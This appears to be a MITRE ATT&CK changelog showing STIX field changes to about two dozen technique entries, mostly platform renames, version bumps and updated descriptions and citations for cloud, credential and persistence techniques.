x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1552.008] Unsecured Credentials: Chat Messages
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-11 00:34:00.779000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1070.008] Indicator Removal: Clear Mailbox Data
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-12 20:56:32.743000+00:00 | 2024-10-15 15:43:56.839000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Office 365 | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Google Workspace | |
[T1059.009] Command and Scripting Interpreter: Cloud API
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-14 18:04:54.607000+00:00 | 2024-10-15 15:44:20.143000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[2] | Office 365 | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Google Workspace | |
[T1087.004] Account Discovery: Cloud Account
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-03-16 12:54:41.133000+00:00 | 2024-10-15 15:51:18.808000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1136.003] Create Account: Cloud Account
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-28 16:14:28.678000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | Google Workspace | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1078.004] Valid Accounts: Cloud Accounts
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-29 15:42:13.499000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.7 | 1.8 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1586.003] Compromise Accounts: Cloud Accounts
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 14:21:57.991000+00:00 | 2024-10-16 21:26:36.312000+00:00 |
description | Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021) | Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022', 'description': 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.', 'url': 'https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/'} |
external_references | | {'source_name': 'Netcraft SendGrid 2024', 'description': 'Graham Edgecombe. (2024, February 7). Phishception – SendGrid is abused to host phishing attacks impersonating itself. Retrieved October 15, 2024.', 'url': 'https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/'} |
[T1069.003] Permission Groups Discovery: Cloud Groups
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-21 13:33:40.625000+00:00 | 2024-10-15 15:51:35.759000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1538] Cloud Service Dashboard
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-19 04:25:33.300000+00:00 | 2024-10-15 15:51:56.279000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[3] | Google Workspace | Identity Provider |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1526] Cloud Service Discovery
Current version: 1.4
Version changed from: 1.3 → 1.4
New Detections:
- DS0028: Logon Session (Logon Session Creation)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-05-04 18:01:44.086000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
description | An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008). | An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008). |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Logon Session: Logon Session Creation |
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1021.007] Remote Services: Cloud Services
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-14 22:27:04.095000+00:00 | 2024-10-15 15:52:47.255000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Google Workspace | |
[T1213.003] Data from Information Repositories: Code Repositories
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-18 22:44:01.723000+00:00 | 2024-09-04 13:03:54.101000+00:00 |
description | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1059] Command and Scripting Interpreter
Current version: 2.5
Version changed from: 2.4 → 2.5
New Mitigations:
- M1033: Limit Software Installation
- M1047: Audit
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-27 16:43:58.795000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[5] | Azure AD | Office Suite |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1027.004] Obfuscated Files or Information: Compile After Delivery
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-29 20:59:32.293000+00:00 | 2024-10-03 17:43:14.766000+00:00 |
description | Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac) | Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac) |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'ATTACK IQ', 'description': 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske. (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land Binaries. Retrieved July 15, 2024.', 'url': 'https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/'} |
x_mitre_contributors | | Liran Ravich, CardinalOps |
[T1554] Compromise Host Software Binary
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-04-16 13:03:40.824000+00:00 | 2024-10-12 16:52:46.067000+00:00 |
description | Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021) | Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024) |
x_mitre_version | 2.0 | 2.1 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'Google Cloud Mandiant UNC3886 2024', 'description': ' Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert: Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations'} |
x_mitre_contributors | | Liran Ravich, CardinalOps |
x_mitre_contributors | | Jamie Williams (U ω U), PANW Unit 42 |
[T1556.009] Modify Authentication Process: Conditional Access Policies
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-04-18 20:53:46.175000+00:00 | 2024-09-16 16:54:47.595000+00:00 |
description | Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Azure AD, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required.
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures. | Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource.
For example, in Entra ID, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required.
By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[1] | SaaS | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Azure AD | |
[T1213.001] Data from Information Repositories: Confluence
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-06-08 17:08:08.386000+00:00 | 2024-08-30 13:45:42.840000+00:00 |
description |
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
|
Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
|
x_mitre_version | 1.0 | 1.1 |
[T1136] Create Account
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-01-31 20:46:43.215000+00:00 | 2024-10-15 15:53:21.895000+00:00 |
x_mitre_version | 2.4 | 2.5 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1578.002] Modify Cloud Compute Infrastructure: Create Cloud Instance
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_contributors | | ['Arun Seelagan, CISA'] |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-03-08 10:33:02.034000+00:00 | 2024-09-30 13:28:37.416000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1578.001] Modify Cloud Compute Infrastructure: Create Snapshot
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2021-03-08 10:33:02.060000+00:00 | 2024-10-15 15:53:44.870000+00:00 |
external_references[1]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1056.004] Input Capture: Credential API Hooking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2020-11-10 18:29:31.138000+00:00 | 2024-08-27 21:03:56.385000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1110.004] Brute Force: Credential Stuffing
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-03-07 14:28:02.910000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | Identity Provider |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1589.001] Gather Victim Identity Information: Credentials
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-14 23:29:10.396000+00:00 | 2024-10-10 13:45:01.069000+00:00 |
description | Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). | Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.). Adversaries may purchase credentials from dark web markets, such as Russian Market and 2easy, or through access to Telegram channels that distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer Stealer Logs 2023)
